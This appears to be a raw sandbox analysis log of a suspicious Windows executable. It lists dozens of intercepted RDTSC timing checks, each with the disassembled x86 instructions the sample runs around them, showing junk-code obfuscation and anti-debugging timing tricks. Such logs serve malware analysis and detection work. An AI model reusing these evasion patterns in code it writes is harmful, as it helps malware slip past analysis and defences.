Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170500 second address: 5170506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170506 second address: 5170528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, D6A3h 0x00000007 push esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FAD0D216D5Eh 0x00000015 pop esi 0x00000016 push edi 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170528 second address: 517053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517053F second address: 5170545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170545 second address: 517054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51705C7 second address: 51705CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51705CD second address: 51705D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51705D1 second address: 51705E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51705E1 second address: 51705F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51705F1 second address: 5160701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 74h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FAD7DB04DB0h 0x00000010 xor eax, eax 0x00000012 jmp 00007FAD0D1F048Ah 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 mov esi, eax 0x00000024 xor ebx, ebx 0x00000026 cmp esi, 00000000h 0x00000029 je 00007FAD0D216E95h 0x0000002f call 00007FAD121B348Dh 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FAD0D216D5Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5160701 second address: 5160761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAD0CDA8606h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAD0CDA85FCh 0x00000019 xor ah, FFFFFFF8h 0x0000001c jmp 00007FAD0CDA85FBh 0x00000021 popfd 0x00000022 call 00007FAD0CDA8608h 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5160761 second address: 516077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0D216D67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 516077C second address: 51607C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edx, 60273AF6h 0x0000000f mov edx, 45041082h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007FAD0CDA8609h 0x0000001c xchg eax, ecx 0x0000001d jmp 00007FAD0CDA85FEh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cl, 43h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51607C4 second address: 51607FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FAD0D216D60h 0x0000000f mov dword ptr [ebp-04h], 55534552h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51607FA second address: 51607FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51607FE second address: 5160804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5160804 second address: 516080A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 516080A second address: 516080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 516080E second address: 5160812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170998 second address: 51709BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD0D216D65h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51709BF second address: 5170A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FAD0CDA85FEh 0x00000010 cmp dword ptr [75AB459Ch], 05h 0x00000017 pushad 0x00000018 mov ax, 845Dh 0x0000001c popad 0x0000001d je 00007FAD7D686604h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FAD0CDA8601h 0x0000002c or ecx, 649E30A6h 0x00000032 jmp 00007FAD0CDA8601h 0x00000037 popfd 0x00000038 mov edx, esi 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170A27 second address: 5170A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170A2D second address: 5170A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170A31 second address: 5170A5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD0D216D60h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170A5B second address: 5170A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170A5F second address: 5170A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170C31 second address: 5170C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170C37 second address: 5170C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170C3B second address: 5170C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51809CE second address: 5180A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAD0D216D61h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ecx, 6C9BE093h 0x00000016 mov ecx, 4E99F2EFh 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov ebx, esi 0x00000021 pushad 0x00000022 movzx esi, dx 0x00000025 pushfd 0x00000026 jmp 00007FAD0D216D5Fh 0x0000002b sbb cl, 0000002Eh 0x0000002e jmp 00007FAD0D216D69h 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FAD0D216D68h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180A5F second address: 5180A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180A63 second address: 5180A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180A69 second address: 5180A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180A7A second address: 5180A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180A7E second address: 5180AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FAD0CDA8609h 0x00000011 pop eax 0x00000012 call 00007FAD0CDA8601h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180AB7 second address: 5180AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAD0D216D5Ch 0x00000008 pop ecx 0x00000009 mov si, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD0D216D68h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180AE8 second address: 5180B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 mov esi, 250C92EDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B04 second address: 5180B51 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAD0D216D5Ah 0x00000008 add esi, 2DE42288h 0x0000000e jmp 00007FAD0D216D5Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 pushad 0x0000001a mov cx, E81Bh 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 je 00007FAD7DAE45DDh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FAD0D216D69h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B51 second address: 5180B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B57 second address: 5180B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B5B second address: 5180B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B5F second address: 5180B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AB459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAD0D216D62h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B82 second address: 5180B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B88 second address: 5180B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180B8C second address: 5180BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FAD7D68DEF9h 0x0000000e pushad 0x0000000f mov bx, 609Ah 0x00000013 pushfd 0x00000014 jmp 00007FAD0CDA85FBh 0x00000019 and cx, 223Eh 0x0000001e jmp 00007FAD0CDA8609h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 jmp 00007FAD0CDA85FEh 0x0000002b push eax 0x0000002c jmp 00007FAD0CDA85FBh 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 mov ax, 2D8Bh 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 664ED1F second address: 664ED32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnc 00007FAD0D216D58h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665ADD5 second address: 665ADDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665ADDB second address: 665ADE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665ADE3 second address: 665ADEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FAD0CDA85F6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665ADEF second address: 665ADF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665ADF3 second address: 665ADFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E207 second address: 64DD971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FAD0D216D56h 0x00000009 jnp 00007FAD0D216D56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 6712F9BAh 0x00000019 pushad 0x0000001a add ecx, 00B09A44h 0x00000020 jnp 00007FAD0D216D59h 0x00000026 popad 0x00000027 push dword ptr [ebp+122D0BB9h] 0x0000002d jmp 00007FAD0D216D63h 0x00000032 call dword ptr [ebp+122D20ECh] 0x00000038 pushad 0x00000039 mov dword ptr [ebp+122D20B8h], edx 0x0000003f xor eax, eax 0x00000041 jmp 00007FAD0D216D5Fh 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a jmp 00007FAD0D216D69h 0x0000004f mov dword ptr [ebp+122D3775h], eax 0x00000055 mov dword ptr [ebp+122D2130h], esi 0x0000005b mov dword ptr [ebp+122D20B8h], edi 0x00000061 mov esi, 0000003Ch 0x00000066 cld 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D20B8h], edi 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D20E2h], ebx 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d or dword ptr [ebp+122D2EF7h], ebx 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 mov dword ptr [ebp+122D20B8h], edx 0x0000008d push eax 0x0000008e pushad 0x0000008f pushad 0x00000090 jbe 00007FAD0D216D56h 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E416 second address: 665E41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E41F second address: 665E423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E423 second address: 665E4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7D2E72D0h 0x0000000e mov si, di 0x00000011 push 00000003h 0x00000013 pushad 0x00000014 jl 00007FAD0CDA85F9h 0x0000001a mov di, bx 0x0000001d movzx esi, cx 0x00000020 popad 0x00000021 mov cl, bl 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FAD0CDA85F8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov cx, EAF0h 0x00000043 push 00000003h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FAD0CDA85F8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov esi, dword ptr [ebp+122D3699h] 0x00000065 push BB2F4A7Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E4A4 second address: 665E4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E4A8 second address: 665E4AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E4AC second address: 665E4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E4B2 second address: 665E4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 04D0B584h 0x00000010 xor dword ptr [ebp+122D2F6Eh], esi 0x00000016 lea ebx, dword ptr [ebp+1245410Ah] 0x0000001c mov edi, dword ptr [ebp+122D37D5h] 0x00000022 mov ecx, dword ptr [ebp+122D36B1h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jl 00007FAD0CDA85F8h 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E542 second address: 665E5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007FAD0D216D5Ch 0x0000000b jg 00007FAD0D216D56h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+122D20BDh], ebx 0x0000001b push 00000000h 0x0000001d mov cl, 21h 0x0000001f call 00007FAD0D216D59h 0x00000024 jp 00007FAD0D216D5Eh 0x0000002a push eax 0x0000002b jmp 00007FAD0D216D64h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007FAD0D216D61h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E5A9 second address: 665E5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E5AD second address: 665E62D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FAD0D216D5Ch 0x0000000f jnp 00007FAD0D216D56h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jg 00007FAD0D216D66h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FAD0D216D5Ch 0x00000028 popad 0x00000029 pop eax 0x0000002a mov edi, dword ptr [ebp+122D3809h] 0x00000030 jmp 00007FAD0D216D64h 0x00000035 push 00000003h 0x00000037 mov si, BDE5h 0x0000003b push 00000000h 0x0000003d mov esi, dword ptr [ebp+122D3835h] 0x00000043 stc 0x00000044 push 00000003h 0x00000046 push edx 0x00000047 mov esi, dword ptr [ebp+122D36E5h] 0x0000004d pop ecx 0x0000004e call 00007FAD0D216D59h 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E62D second address: 665E631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E631 second address: 665E65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FAD0D216D58h 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FAD0D216D5Eh 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E65D second address: 665E663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E663 second address: 665E6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007FAD0D216D69h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FAD0D216D5Fh 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnp 00007FAD0D216D56h 0x00000024 jmp 00007FAD0D216D5Eh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E6A0 second address: 665E6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 665E6A6 second address: 665E6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jnl 00007FAD0D216D5Ch 0x00000012 add edx, dword ptr [ebp+122D36BDh] 0x00000018 lea ebx, dword ptr [ebp+12454115h] 0x0000001e mov ecx, esi 0x00000020 xchg eax, ebx 0x00000021 js 00007FAD0D216D74h 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007FAD0D216D56h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667E3C2 second address: 667E3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667E3C6 second address: 667E3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
